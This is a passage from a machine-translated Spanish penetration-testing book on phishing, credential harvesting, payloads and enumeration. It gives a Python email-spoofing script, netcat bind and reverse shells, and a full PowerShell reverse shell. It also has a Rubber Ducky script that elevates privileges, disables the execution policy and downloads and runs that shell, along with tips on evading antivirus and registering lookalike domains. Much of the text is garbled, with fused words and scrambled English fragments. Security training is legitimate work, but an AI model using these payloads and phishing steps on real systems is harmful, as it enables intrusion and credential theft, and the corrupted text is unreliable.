totakeadvantageoftheyearlylicense.ThisisapplicablenotonlyforMaltego, butformostofthesecuritytoolsoutthere (por ejemplo, Nessus, BurpSuitePro, etc.). Si youwanttoshowprofessionalresults, youmustpaythepriceaccordinglytoget thejobdonecorrectly. Resumen La recopilación de información es uno de los componentes principales durante un compromiso. Incluso si no va a realizar un ataque de ingeniería social, esta fase le dará un ángulo diferente sobre el dominio o la empresa a la que se dirige. La web siempre oculta algunos secretos, como contraseñas comprometidas, datos confidenciales, etc. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 5 Ingeniería SocialAtaques Cuando leo un libro, por lo general odio las introducciones largas que no abordan directamente el tema. Entonces, vayamos al grano. En este capítulo, aprenderá sobre ingeniería social y diferentes técnicas que lo ayudarán a aprovechar la debilidad humana. Tome nota, este libro trata de enseñarle los principios que puede usar en cualquier herramienta instalada en Kali Linux. En este capítulo, aprenderá sobre los siguientes temas de ingeniería social: Envío de correos electrónicos de phishing Robo de credenciales Uso del kit de herramientas de ingeniería social Conceptos básicos de las cargas útiles y los oyentes Uso del USB Rubber Ducky para ataques de ingeniería social SpearPhishingAtaques Entonces, ¿qué es el phishing? El phishing es un ataque de fraude por correo realizado contra un gran número de víctimas; contiene un elemento de interés general que atraerá a las personas a actuar en el correo electrónico. Por ejemplo, puede anunciar una botella de medicamento gratis e incluir un enlace malicioso o un archivo adjunto. Spearphishing es una forma muy específica de ataque de phishing. Por ejemplo, si el atacante sabe que el departamento de ventas usa una aplicación particular para administrar sus relaciones con los clientes, el atacante puede falsificar un correo electrónico, fingiendo que es del proveedor de la aplicación con el asunto "Emergencia" y la instrucción diciéndole que haga clic en un enlace para descargar una copia, un parche o una actualización. ¿Cuántos representantes de ventas cree que van a hacer clic en ese enla Canal de Telegram : @IRFaraExam Machine Translated by Google Enviando un correo electrónico Antes de saltar a un ejemplo práctico, hay dos puntos importantes que debe saber antes de enviar un correo electrónico a sus víctimas: Primero, necesita tener una cuenta SMT Prelay (estoy usando mi servicio de retransmisión GoDaddy). Realice una investigación para encontrar el servicio adecuado para usted. Necesita un correo electrónico profesional y convincente o, de lo contrario, su ataque fracasará inevitablemente. El kit de herramientas de ingeniería social El kit de herramientas de ingeniería social (SET), escrito por el líder de seguridad David Kennedy, está diseñado para realizar ataques avanzados contra las debilidades humanas; esto se conoce como ingeniería social . KaliLinux ya tiene esta herramienta preinstalada de forma predeterminada. Para la unidad, deberá ejecutar el kit de herramientas en la ventana de su terminal: root@kali:/#setoolkit Para enviar un correo electrónico, seleccione Ataques de ingeniería social en el primer menú: Seleccionedelmenú: 1) Ataques de ingeniería social 2) Pruebas de penetración (vía rápida) 3) Módulos de terceros 4) Actualice el kit de herramientas de ingeniería social 5) Actualizar la configuración de SET 6) Ayuda, Créditos y Acerca de 99) Salir del kit de herramientas de ingeniería social conjunto>1 A continuación, seleccione MassMailerAttack (opción n.º 5): Seleccionedelmenú: 1) Vectores de ataque de suplantación de identidad (spear-phishing) 2)Vectores de ataque al sitio web 3) Generador de medios infecciosos 4) Crear una carga útil y un oyente 5) Ataque de correo masivo 6) Vector de ataque basado en Arduino Canal de Telegram : @IRFaraExam Machine Translated by Google 7) Vector de ataque de punto de acceso inalámbrico 8)Vector de ataque del generador de código QR 9) Vectores de ataque Powershell 10) Módulos de terceros 99) Vuelva al menú principal. conjunto> 5 En la ventana siguiente, tiene la opción de enviar un correo electrónico a un grupo de personas oa un solo individuo. Veamos cómo se verá nuestro escenario de ataques por correo electrónico. Por el bien de este ejemplo, suponga que usted, como miembro del equipo rojo, finge ser un representante de Microsoft, y está enviando un correo electrónico al administrador (un empleado que trabaja en el blog de hacking ético de la empresa) para decirle que la máquina del administrador debe actualizarse. El correo electrónico contiene una URL maliciosa en la que el administrador debe hacer clic. Volviendo a nuestro menú SET, enviaremos el correo electrónico a una sola persona. Elijamos la opción número 1 y presione Enter: Qué es lo que quieres hacer: 1.E-MailAttackSingleE-mailAddress 2.E-MailAttackMassMailer 99.Vuelvaalmenúprincipal. conjunto: correo> 1 Aquí, estamos enviando este correo al administrador deethicalhackingblog.com (Sin embargo, recuerde probar estos ejercicios con algo de su propiedad). establecer: phishing> Enviar correo a: admin@ethicalhackingblog.com 1.UseunaCuentaGmailparasuataquedecorreoelectrónico. 2.Usesupropioservidoroopenrelay conjunto: suplantación de identidad> 2 Cuando vea las opciones anteriores, tendrá la tentación de elegir Gmail, porque es gratis y no necesita una cuenta de retransmisión, ¿verdad? Bueno, si lo prueba, Google bloqueará con gusto sus archivos adjuntos. Canal de Telegram : @IRFaraExam Machine Translated by Google Gmail. Somos profesionales, ¿verdad? ¡No niños de secuencias de comandos! Ya que estamos utilizando una cuenta de retransmisión, elegiremos la opción 2. El correo electrónico debe ser de Microsoft. Por lo tanto, complete la información de retransmisión. (¡Esta pieza debe reflejar la información de su relé, no la mía!) La figura 5.1 muestra cómo se ve cuando el administrador recibe el correo electrónico. Figura 5.1 AdminE ÿmail Preste atención a estas dos cosas en el correo electrónico: Los errores gramaticales no están permitidos. Por ejemplo, "siguiente" no es correcto en el mensaje anterior, por lo que llamará la atención sobre la autenticidad del correo electrónico. Si desea utilizar direcciones URL, asegúrese de que estén cerca del nombre de dominio real. Por ejemplo, micosoft (sin la r) está muy cerca de Microsoft. Enviar un correo electrónico usando Python Python es un lenguaje excelente para hacer cosas en pruebas de penetración. Más adelante en este libro, aprenderá los entresijos de este lenguaje de programación. Por el momento, el siguiente código muestra cómo enviar correos electrónicos sin depender de una aplicación que lo haga por usted. #Usethesmtplibtosendane-mail importsmtplib #Configuración #Tu-dirección-de-correo,larealista sender_email=[senderemail] #Youre-mailusername username=[smtpaccountusername] #Contraseñarequeridaparasucuentadecorreo Canal de Telegram : @IRFaraExam Machine Translated by Google contraseña=[contraseña de su cuenta SMTP] #información de correo electrónico falsificada spoofed_email=[dirección de correo electrónico falsa] #Spoofedfullname spoofed_name='JuanDoe' #victimemailaddressvictim_email=[victimemailaddress] #Emailsubjectsubject="esteesunasunto\n" #E-mailbodymessage body="Esteeselcuerpo." +nombre_suplantado+ header=('Para:'+victim_email+'\n'+'From:'<'+spoofed_email+'>'+'\n'+'Subject:'+asunto) message=(header+'\n\n'+body+ '\n\n') tratar: session=smtplib.SMTP_SSL([smtpserverdomain],[smtpserverportnumber]) session.ehlo() session.login(username,password) session.sendmail(sender_email,victim_email,message) session.quit() print"EmailSentWithSuccess!" excepto smtplib.SMTPException: imprime "Error: ¡No se puede enviar el correo electrónico!" Robo de credenciales Es hora de revelar el método más beneficioso y eficiente que puede utilizar para un ataque de ingeniería social. Solo una advertencia: esto no es un tutorial para que lo use con sus amigos para robar sus contraseñas. Este es un libro profesional para personas que quieren aprender a aplicar este tipo de trucos en sus carreras. Para iniciar este ataque, primero debe preparar un correo electrónico HTML profesional y asegurarse de que no tenga dudas cuando la víctima lo reciba. Un desarrollador puede ayudarlo a clonar un sitio web y adjuntarle una base de datos para que cada vez que las víctimas envíen sus credenciales, se guardarán en esa base de datos. 1.Seleccione la opción 1: Ataques de ingeniería social. Canal de Telegram : @IRFaraExam ' Machine Translated by Google 2.Seleccione la opción 2:Vectores de ataque al sitio web. 3.Seleccione la opción 3: CredentialHarvesterAttackMethod. 4.Seleccione la opción 2: SiteCloner. set:webattack>IPaddressforthePOSTbackinHarvester/Tabnabbing[10.0.20.140]:[Ingrese su dirección IP de Kali aquí] [-]SET admite HTTP y HTTPS [-]Ejemplo:http://www.thisisafakesite.com establecer: ataque web> Ingrese la urltoclone: https://10.0.20.1/#/login [*]Clonacióndelsitioweb:[IngreselaURLdeiniciodesesiónobjetivo] [*]Esto podría tomar un poco... La mejor manera de usar este ataque es si los campos de formulario de nombre de usuario y contraseña están disponibles. [*]TheSocial-EngineerToolkitCredentialHarvesterAttack [*]La cosechadora de credenciales se está ejecutando en el puerto 80[*]Se le mostrará información a medida que llegue a continuación: La segunda parte importante es el enlace que va a agregar en su correo electrónico. ¿CuáleslamejormaneradeofuscaresaURL?Bueno,larespuestasimpleparacrear un dominio y, a continuación, cree un subdominio que sea una copia del original. toma el Facebook.com dominiocomounejemplo.Paraobtenerunresultadoexitoso,creaun dominiofalsoconunnombresimilarcomoFcb.com _ y luego crear un subdominio Facebook.com . Esto es lo que debería verse: facebook.fcb.com No te animo a que uses Facebook en tu prueba. permisopararealizarestaacción.Estoessolounejemplo. En la práctica, los equipos rojos y los probadores de penetración necesitarán usar el sitio web del empleador o del cliente. Un excelente ejemplo realista es clonar el intranetdetucliente/empleadorparaquepuedasrobareldominiodelavíctima credenciales. A continuación, enviará el correo electrónico a su víctima, mientras ve el sección anterior. Idealmente, usó un correo electrónico convincente que persuade a los empleados para hacer clic en la URL que redirigirá a los empleados al sitio falso. comenzarán a escribir sus credenciales, y cuando hagan clic en el botón de inicio de sesión, ser redirigido al sitio real. El atacante ahora tiene las credenciales del víctimas desafortunadas. Cargas útiles y oyentes Canal de Telegram : @IRFaraExam Machine Translated by Google En esta sección, aprenderá a crear una carga útil y un oyente. Si es un principiante, estos son los aspectos básicos que debe tener en cuenta antes de continuar. Una carga útil es un ejecutable que le permitirá conectarse a un oyente. El objetivo es tener una conexión TCP entre el host de la víctima y el atacante. Una vez establecida esta conexión, el pirata informático podrá manipular el sistema operativo de la víctima mediante un shell remoto. Este shell remoto puede ser un shell combinado o un shell inverso. BindShellvs.ReverseShell Es vital comprender la diferencia entre un shell atado y un shell inverso antes de pasar al siguiente capítulo de este libro. Muchos aficionados y profesionales de la seguridad tienen una idea confusa de estos dos conceptos. Usaremos algunos ejemplos prácticos para ayudarlo a comprenderlos. BindShell En un caparazón, el atacante se conecta directamente desde Kalito, la máquina de la víctima, donde el oyente ya ha sido lanzado (ver Figura 5.2). Para este escenario, usaremos Netcat para hacer el trabajo. Esta herramienta es conveniente para practicar pruebas de penetración, desafíos de captura de bandera (CTF) y exámenes de certificación como OSCP. Nos conectaremos directamente desde el host atacante Kali a un host de destino de Windows 10. Figura 5.2 BindShell Si desea practicar el mismo ejercicio por su parte, existe un binario de Netcat para Windows en Kal guardado en /usr/share/windows-binaries/nc.exe . Copie el archivo nc.exe en su host de Windows para reproducir los resultados. Canal de Telegram : @IRFaraExam . Machine Translated by Google A continuación, ejecute Netcat en modo de escucha con la opción ÿl ; además, use el puerto 9999 para escuchar las conexiones entrantes. PSC:\Users\gus\Documents\Shared>./nc.exe-nlvp9999-eC: \Windows\System32\cmd.exe listeningon[any]9999… Después de ejecutar la escucha en el host de Windows, vuelva a la sesión de Kaliteral y conéctese directamente al sistema operativo Windows mediante Netca en el puerto 9999: root@kali:/#nc-nv10.0.20.1279999 (DESCONOCIDO) [10.0.20.127]9999(?)abierto MicrosoftWindows[Versión 10.0.17763.1039] (c)2018MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\gus\Documentos\Compartido> ReverseShell Un shell inverso es una opción favorita para los probadores de penetración, y leerá mucho al respecto en este libro. El método es lo opuesto al shell vinculante. El secreto no está en ninguna parte: en una conexión de shell inverso, los cortafuegos generalmente permitirán que el tráfico pase. Figura 5.3 ReverseShell Practiquemos el escenario de shell inverso con Netcat de nuevo. Primero, ejecute Netcat listener en el host (Kali en este ejemplo). Use el puerto 8888 para escuchar Canal de Telegram : @IRFaraExam Machine Translated by Google conexiones entrantes: root@kali:/#ncÿnlvp8888 escuchando[cualquiera]8888… A continuación, cambie al host de Windows de la víctima y conéctese al oyente en el puerto 8888. Tenga en cuenta que la dirección IP del KaliVM es 10.0.20.140: PSC:\Usuarios\gus\Documentos\Compartido>./nc.exe10.0.20.1408888-eC: \Windows\System32\cmd.exe Volvamos a nuestro host Kali y deberíamos ver un shell inverso exitoso. root@kali:/#nc-nlvp8888 escuchando en [cualquier] 8888… conectarse a [10.0.20.140] desde (DESCONOCIDO) [10.0.20.127] 54479 MicrosoftWindows[Versión 10.0.17763.1039] (c)2018MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\gus\Documentos\Compartido> Shell inverso con SET Debe tener cuidado con la forma en que asegura su carga útil antes de enviarla a su destino. En otras palabras, debe asegurarse de que el ejecutable de su carga útil no sea detectado por el software antivirus instalado en la PC de la víctima. www.virustotal.com/gui/home/upload Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 5.4 VirusTotal La mejor manera de ofuscar sus cargas útiles es usando una personalizada. En otras palabras, debe desarrollar una carga útil usando un lenguaje de programación como Python, PowerShell, C#, etc. Aprenderá más sobre este tema en este libro, pero por el momento, veamos cómo generar una carga útil usando SET. Primero, ejecute la aplicación SET y elija las siguientes opciones: Seleccione la opción 1: Ataques de ingeniería social Seleccione la opción 4: Crear una carga útil y un oyente Seleccione la opción 1: WindowsShellReverse_TCP A continuación, se le pedirá que ingrese su IP de host Kali (atacante) y el número de puerto que desea escuchar. Una vez que lo haga, generará una carga útil en /root/.set/payload.exe . Finalmente, se le pedirá que inicie el oyente . Canal de Telegram : @IRFaraExam Machine Translated by Google set:payloads>IPaddressforthepayloadlistener(LHOST):10.0.20.140 set:payloads>IngresarelPUERTOparaelescuchainverso:7777 [*]Generandolacarga útil..seapaciente. [*]La carga útil se ha exportado al directorio SET predeterminado ubicado en /root/.set/ payload.exe set:payloads>¿Desea iniciar la carga útil y escuchar ahora? (sí/no): sí [*] Al iniciar msfconsole, esto puede tardar unos minutos en cargarse. Tenga paciencia... En esta etapa, el SET inicia automáticamente el oyente del controlador múltiple Metasploit. Profundizaremos en Metasploit más adelante en este libro, y verá cómo crear un oyente manualmente. SET hace todo por usted sin la molestia manual. El oyente ahora debería estar funcionando y esperando las conexiones entrantes de las víctimas: =[metasploitv5.0.85-dev] +---=[2002exploits-1093auxiliary-342post] +---=[560payloads-45encoders-10nops] +----=[7evasión] Sugerencia para metasploit: puede usar la ayuda para ver todos los comandos disponibles [*]Processing/root/.set/meta_configforERBdirectives. resource(/root/.set/ meta_config)>usemulti/handler resource(/root/.set/ meta_config)>setpayloadwindows/shell_reverse_tcp payload=>windows/ shell_reverse_tcp resource(/root/.set/meta_config)>setLHOST10.0.20.140 LHOST=>10.0.20.140 recurso(/root/.set/meta_config)>setLPORT7777 LPORT=>7777 recurso(/root/.set/meta_config)>setExitOnSessionfalse ExitOnSession=>falso recurso(/root/.set/meta_config)>explotar -j [*]Exploitejecutándose como trabajo en segundo plano0. [*]Exploitcompletó, pero no se creó ninguna sesión. [*]IniciadoreverseTCPhandleron10.0.20.140:7777msf5exploit(multi/ handler)> Es hora de enviar la carga útil a la VM host de Windows 10 de nuestra víctima y ejecutarla Canal de Telegram : @IRFaraExam Machine Translated by Google desde allí. Tome nota de que la carga útil se guarda en /root/.set/payload.exe . A continuación, copie payload.exe en el host de Windows y haga doble clic para ejecutarlo. desde dentro de la VM de Windows. Para que esto funcione, tengo que deshabilitar la software antivirus en el host de Windows 10 antes de copiar el archivo payload.exe . Después de ejecutar el archivo de carga útil en el host de Windows, Metasploit Listener debe mostrar una conexión exitosa. Para visualizar la sesión actualmente abierta, use el comando de sesiones . Después de ejecutar el comando de sesiones , indicar que hay una sesión abierta. Para interactuar con esa sesión, ejecute el sesiones-i1 comando. Una vez que presione Entrar, tendrá una Windowsshell para usar al alcance de su mano: [*]IniciadocontroladorTCPreversoen10.0.20.140:7777msf5exploit(multi/ handler)>[*]Commandshellsession1abierto(10.0.20.140:7777>10.0.20.127:54501)en2020-05-2211:27:38-0400 sesiones Sesiones activas =============== IdNombreTipoInformaciónConexión --------------------------------------------1 shellx86/windowsMicrosoftWindows[Versión 10.0.17763.1039] (c)2018MicrosoftCorporation.A…10.0.20.140:7777>10.0.20.127:54501(10.0.20.127) msf5exploit(multi/controlador)>sesiones-i1 C:\Usuarios\gus\Documentos\Compartido> Ingeniería social con USBRubberDucky El USBRubberDuckyesuninventofantásticoparalosataquesdeingenieríasocial. Puede comprarlo en la tienda en línea de Hak5 y viene con tutoriales que le muestran cómo funciona: shop.hak5.org/products/usb-rubber-ducky-deluxe El USBRubberDucky se utilizó en la temporada 2 de Mr. Robot debido a la efectividad del ataque, así que qué es mejor que usar esta herramienta que se mostró en ¿Un programa de televisión de Hollywood? ¿Por qué esta herramienta es tan convincente? El USB Rubber Ducky no es una memoria USB, aunque parece uno; es, de hecho, un teclado. ¿Y adivina qué? Antivirus Canal de Telegram : @IRFaraExam Machine Translated by Google el software pensará que acaba de conectar un teclado y no una memoria USB. ¡Aún no hemos terminado! Cuando insertes este dispositivo en la computadora, comenzará a escribir y ejecutar lo que quieras en la máquina de la víctima: ¡qué invento fantástico! En la Figura 5.5, puede ver el USB Rubber Ducky con su cubierta de plástico (si compara su tamaño con una memoria USB real, es bastante más pequeña que la mayoría de las USB en el mercado), y en el lado derecho, la cubierta se ha quitado por completo. Figura 5.5 USBRubberDucky En la imagen de la derecha, puede ver una tarjeta MicroSD insertada; la usaremos para guardar nuestro script de carga útil. Repasemos los pasos que debe seguir para poner este juguete en funcionamiento: 1. Extraiga la tarjeta Micro SD del USB Rubber Duck e insértela en un Adaptador USB (consulte la Figura 5.6). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 5.6 USBRubberDucky con MicroSD 2. Tome el adaptador USB y péguelo en su caja Kali Linux. Es hora de comenzar a desarrollar su secuencia de comandos Ducky. Aquí hay una secuencia de comandos de muestra que abrirá el Bloc de notas en la máquina de la víctima e imprimirá "Hello World" (dentro del Bloc de notas): REMMyFirstScriptÿcomentarios WINDOWSrÿWindows+R=abrir la ventana DELAY100ÿdéle tiempo para abrir con un retraso STRINGnotepad.exeÿescribanotepad.exedentrodelejecutarENTERÿretornodelcarroparaabrirnotepad DELAY200ÿdéletiempoparaabrir STRINGHelloWorld!ÿescribaeltexto"HelloWorld!"dentrodeunnotepad 3. Cuando termine de escribir el script, guárdelo en un archivo de texto. En esta etapa, necesitamos compilarlo usando el siguiente comando: $ java-jar [ruta del archivo de codificador de pato] -i [el archivo de texto de entrada] -o [el archivo de salida que se generará] Después de ejecutar el comando javaencoder anterior, debe guardar el archivo .bin de salida en la tarjeta MicroSD. Tenga en cuenta que es el archivo .bin el que se ejecutará cuando el patito se inserte en el host de la víctima . 4. Expulse el adaptador USB de su servidor Kali y vuelva a colocar la unidad MicroSD en el USBRubberDucky. Canal de Telegram : @IRFaraExam Machine Translated by Google 5. Es hora de la parte divertida: inserte el USB Rubber Ducky en su PC de destino. Para asegurarse de que funciona, puede probar en una PC diferente para visualizar la salida (también para asegurarse de que no ha cometido ningún error de tiempo de ejecución de codificación en el script). En general, cuando inserta el USB Rubber Duckystick en la PC de la víctima, ejecutará la secuencia de comandos automáticamente. Pero en caso de que la secuencia de comandos no se ejecute o falle, tiene la opción de usar la unidad manualmente haciendo clic en el pequeño botón negro Ejecutar en el medio. ( Consulte la Figura 5.5; parece un pequeño botón de reinicio). APrácticoReverseShellUsingUSBRubberDuckyand Potencia Shell Este capítulo finaliza con una gran receta para shell inverso contra sistemas operativos Windows, utilizando PowerShell. Este lenguaje de secuencias de comandos fue inventado por Microsoft como un equivalente a Bashin Linux OS. Antes de aprender cómo aprovechar este comportamiento en la práctica, estos son los pasos utilizados en este escenario: 1. Genere un shell inverso de PowerShell mediante SET. 2. Comience a escuchar en el host Kali. 3. Aloje el archivo .ps1 de PowerShell en el servidor web Kali. 4. Cambie al host de Windows y ejecute PowerShell en modo administrativo. 5. Ejecute un comando que descargará y ejecutará el host de script .ps1 en elKaliVM. 6.Compruebe que tiene un shell nuevo en el host de Windows. 7. Vuelva a crear la escena de PowerShell con USB Rubber Ducky. Generación de un script de PowerShell Abra la aplicación SET y realice los siguientes pasos: 1. Seleccione la opción número 1: Ataques de ingeniería social. 2. Elija la opción número 9: PowerShell AttackVectors. 3.Seleccioneopciónnúmero2:PowerShellReverseShell. A continuación, se le pedirá que ingrese su dirección IP de Kali. (Mi dirección IP de Kali es 10.0.20.140). Ingrese el puerto en el que desea escuchar (usaremos 443 para este ejemplo, que representa HTTPS/TLS para ofuscación). Canal de Telegram : @IRFaraExam Machine Translated by Google le preguntará si desea iniciar el oyente, y seleccionará no . (Entenderá por qué pronto): Ingrese la dirección IP o el nombre DNS para el host inverso: 10.0.20.140 set: powershell> Ingrese el puerto para el oyente [443]: 443 [*] Reescribiendo el shell inverso de power shell con opciones [*] Exportando las cosas de power shell a/root/.set/reports/powershell set> ¿Desea iniciar un oyente [sí/no]: no Inicio de un oyente En el paso anterior, decidimos no iniciar el oyente porque queremos buscar un patrón diferente. Ahora que sabe quién funciona con el shell inverso, iniciaremos un oyente manualmente usando Netca en Kalibox. También puede usar Metasploit, pero para simplificar, sigamos con Netcat: root@kali:~#nc-nlvp443 escuchando[cualquiera]443… -n:NorealizarbúsquedaDNS -l:mododeescucha -v:mododetallado -p:establecerelnúmerodepuertodeescucha Hospedaje del script de PowerShell El kit de herramientas SET ha generado un archivo de texto en la siguiente ruta: ~/.set/informes/powershell/powershell.reverse.txt Si abre el archivo de texto, se dará cuenta de que SET ya ha completado la dirección IP y el número de puerto para usted: limpieza de funciones{ if($client.Connected-eq$true){$client.Close()} if($process.ExitCode-ne$null){$process.Close()} exit} //ConfigurarIPADDR $dirección='10.0.20.140' //SetupPORT $port='443' $client=New-Objectsystem.net.sockets.tcpclient $client.connect($address, $port) $stream=$client.GetStream() $networkbuffer=NewObjectSystem.Byte[ ]$client.ReceiveBufferSize $process=NewObjectSystem.Diagnostics.Process Canal de Telegram : @IRFaraExam Machine Translated by Google $process.StartInfo.FileName='C:\\windows\\system32\\cmd.exe' $process.StartInfo.RedirectStandardInput=1 $process.StartInfo.RedirectStandardOutput=1 $process.StartInfo.UseShellExecute=0 $process.Start () $inputstream=$process.StandardInput $outputstream=$process.StandardOutput Start-Sleep1 $encoding=newobjectSystem.Text.AsciiEncoding while($outputstream.Peek()-ne-1) {$out+=$encoding.GetString ($outputstream.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out=$null;$done=$false; $testing=0; while(-not$done){ if($client.Connected-ne$true){cleanup} $pos=0;$i=1 while(($i-gt0)-and($pos-lt$networkbuffer.Length )){ $lectura=$stream.Read($networkbuffer, $pos,$networkbuffer.Length-$pos) $pos+=$read;if($pos-and($networkbuffer[0..$ ($pos-1 )]-contains10)){break}} if($pos-gt0){ $string=$encoding.GetString($networkbuffer,0,$pos) $inputstream.write($string) start-sleep1 if($process. ExitCode-ne$null){limpieza} else{ $out=$codificación.GetString($outputstream.Read()) while($outputstream.Peek()-ne-1) { $out+=$encoding.GetString($outputstream.Read());if($out- eq$string){$out=''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out=$null $string=$null}} else{cleanup}} Hay un pequeño problema con el código anterior y tenemos que solucionarlo. Los prefijos de comentarios son incorrectos, por lo que debemos deshacernos de estas dos líneas de comentarios por completo borrándolas: Eliminar esta línea://ConfigurarIPADDR Eliminar esta línea: // SetupPORT Ahora guarde este archivo como .ps1 ; en el caso de nuestro ejemplo, llamemos ps.reverse.ps1 y luego cópielo en el directorio del servidor web. No olvide iniciar los servicios del servidor web para que podamos invocarlo desde la máquina host de Windows: Canal de Telegram : @IRFaraExam Machine Translated by Google root@kali:~/.set/reports/powershell#cpps.reverse.ps1/var/www/html/ root@kali:~/.set/reports/powershell#serviceapache2start EjecuciónPowerShell A continuación, cambie al host de Windows y ejecute PowerShell en modo administrador. esto, abra el menú de Windows y busque PowerShell. Luego, haga clic con el botón derecho y elija Ejecutar como administrador, como se muestra en la Figura 5.7. Descargar y ejecutar el script PS Ahora que tiene PowerShell ejecutándose, el siguiente paso es ejecutar un par de comandos para poner en marcha y ejecutar el shell remoto. Primero, cambie la ejecución política en PowerShell para que pueda ejecutar comandos con privilegios elevados. ejecute el comando que descargará el script de Kali VM y ejecutará la unidad enlasesiónactualmenteabierta: WindowsPowerShell Copyright(C)MicrosoftCorporation.Todoslosderechosreservados. PSC:\Windows\system32>SetÿExecutionPolicyUnrestricted ExecutionPolicyChangeExecutionPolicyChange La política de ejecución ayuda a protegerlo de scripts en los que no confía. Cambiar la política de ejecución podría exponer a los riesgos de seguridad descritos en el tema de ayuda about_Execution_Policies https: /go.microsoft.com/fwlink/? LinkID = 135170. ¿Desea cambiar la directiva de ejecución? [Y] Sí [A] Sí a todos [N] No [L] No a todos [S] Suspender [?] Ayuda (predeterminado es "N"): S PSC:\Windows\system32> IEX(Newÿ ObjectNet.WebClient).DownloadString('http://10.0.20.140/ps.reverse.ps1') Cierto Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 5.7 Ejecución de PowerShellinAdminMode ReverseShell Si volvemos a nuestro host Kali, deberíamos ver un caparazón inverso en nuestro Netcat Sesión de terminal de Windows: Canal de Telegram : @IRFaraExam Machine Translated by Google root@kali:~#nc-nlvp443 escuchando[cualquier]443… conectarse a[10.0.20.140]desde(DESCONOCIDO)[10.0.20.127]50820 MicrosoftWindows[Versión10.0.17763.1217] (c)2018MicrosoftCorporation.Todoslosderechosreservados. C:\Windows\sistema32> ReplicacióndelataqueusandoelUSBRubberDucky Ahora que vio cómo ejecutar los pasos anteriores en un entorno de entorno, el siguiente paso es replicar estos eventos usando el USBRubberDucky. REMReverseShellProgram DEMORA100 REMAbrir la ventana de ejecución VENTANASr DELAY1000 REMExecutePowerShellasAdmin STRINGpowershell "Start-Processpowershell-verbrunAs" DELAY100 ENTER DELAY5000 ALTy DELAY1000 REMHabilitar secuencia de comandos de ejecución STRINGEstablecer política de ejecución sin restricciones ENTER DELAY5000 REMAceptarel mensaje de aviso ENTER REMConectarse a la máquina atacante STRINGIEX(New-ObjectNet.WebClient).DownloadString('http:// 10.0.20.140/ps.reverse.ps1') INGRESAR Resumen Vio muchas técnicas en este capítulo para los ataques de ingeniería social, pero ¿cómo puede saber cuál es la mejor y cuál elegir para el escenario correcto? Estas son las pautas generales que debe conocer cuando comience a planificar sus ataques de ingeniería social: Primero, asegúrese de que cuando prepare su mensaje de correo electrónico o llamada telefónica, Canal de Telegram : @IRFaraExam Machine Translated by Google son convincentes y lo suficientemente profesionales como para que el usuario final muerda el anzuelo. Segundo, el secreto para un ataque de ingeniería social exitoso es la preparación adecuada. éxito. Luego viene la fase de infección. Si desea utilizar un kit de hardware en sus ataques, asegúrese de utilizar uno bueno como el USB Rubber Ducky, por ejemplo. Asyoumayhavesurelynoticed, myfavoritemethodtoinfectWindows machinesisusingPowerShell.Inarealengagement, generado por , que aprenderás don'tusethepre reverseshellsliketheoneinMetasploit (por ejemplo, msfvenom moreaboutlaterinthisbook), becauseantivirussoftwarewillbeveryhappyto catchit.Thebestwaytousereverseshellsistouseonethatyoudeveloped yourselfusingyourfavoriteprogramminglanguagesuchasPowerShell, Python, C ++, orJava; intheend, shellsintheupcomingchapters it'syourchoice.Youwilllearnmoreaboutreverse. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 6 Fase de enumeración avanzada . Inthischapter, youwilllearnhowtohandletheenumerationphaseina penetrationtestingengagement.Enumerationinourdiscussionmeanscollecting thenecessaryinformationthatwillallowustoexploitthespecificservice (. Por ejemplo, FTP, SSH, etc) Porejemplo, enableustorevealvalidcredentials theSSHservicebrute-forceenumerationwill, sowecanuseittoexploitandlogintothe thenecessaryinformationsuchasremoteusers remotehost.AnothercommonpracticeistouseNmapscriptssowecangather, serviceversions, remotecode executionexploitation, andmuchmore.Thischapterwon'tcoveralltheservices, butthemostcrucialpartisthatyouunderstandtheconceptoftheenumeration enumerationofthefollowingservices processsothatyoucanapplyittoanytypeofservice.Thischaptercoversthe: FTP SSH Telnet SMTP POP3 e IMAP4 Microsoft SQL OracleDatabaseServerOracleDatabaseServer mysql DockerEngine Jenkins HTTP/S PDR VNC PYME SNMP Canal de Telegram : @IRFaraExam Machine Translated by Google Protocolos de transferencia Previouslyinthisbook, theservicesoneachhost.Atthisstage youlearnedyouhowtoscanthenetworkandidentify, youknowhowtouseNmaptogetthe jobdone.Afterscanningeachhost, vulnerabilitiestoexploit.Forexample weneedtostartinvestigatingpotential, anfitrión youfoundthatyourtargetisaLinux, andit'susingSSHasaservicetoallowremoteuserstoauthenticateinto thehost.Doyouknowwhattodonext? Intheupcomingsections, you'llseethe logicalstructurethatwillallowyoutoenumerateeachpopularservice. FTP (Puerto 21) El Protocolo de transferencia de archivos (FTP) se usa para transferir archivos entre un cliente y un servidor remoto. Este último se usa para almacenar archivos para que pueda acceder a ellos de forma remota. A veces, las aplicaciones web utilizan FTP para sincronizar el código fuente alojado (p. ej., HTML, JavaScript, etc.). Dos implementaciones seguras de FTP son FTP y SFTP. Estas son las debilidades comunes en el protocolo FTP: Las credenciales de inicio de sesión se envían en texto sin cifrar. La transmisión de archivos no está cifrada. Escenarios de explotación para un servidor FTP Es importante entender en esta etapa cómo la explotación buscará este servicio (usted necesita saber de antemano lo que está buscando, o simplemente está escaneando con los ojos cerrados). Un servidor FTP puede ser explotado de diferentes maneras. Estos son los escenarios comunes que encontrará durante su participación: Credenciales de fuerza bruta Olfateando credenciales de texto sin cifrar Rastreo de archivos no cifrados Acceso anónimo Encontrar un exploit público asociado con la versión del servidor FTP de destino (en Canal de Telegram : @IRFaraExam Machine Translated by Google en el capítulo siguiente, aprenderá a buscar exploits públicos) Flujo de trabajo de enumeración A lo largo de este capítulo, obtendrá información sobre cada enumeración de servicios flujo de trabajo a través de ejemplos reales (un ejemplo vale un billón de palabras). ejemplo, el host de destino es una VM vulnerable a Linux y se llama Metaexplotable versión 2; puede obtener una copia de VM de este host desde information.rapid7.com/download-metasploitable-2017.html . Escaneo de servicio Enelprimerpaso,ejecutaremosexploracióndeserviciosbásicosenNmapaparaobtenerunaideadelos servidor FTP de destino: root@kali:~# nmapÿsVÿOÿsCÿp21ÿT5metasploitable.kcorp.local ComenzandoNmap7.80(https://nmap.org)a las 2020-06-0414:33EDT Nmapscan informa sobre la 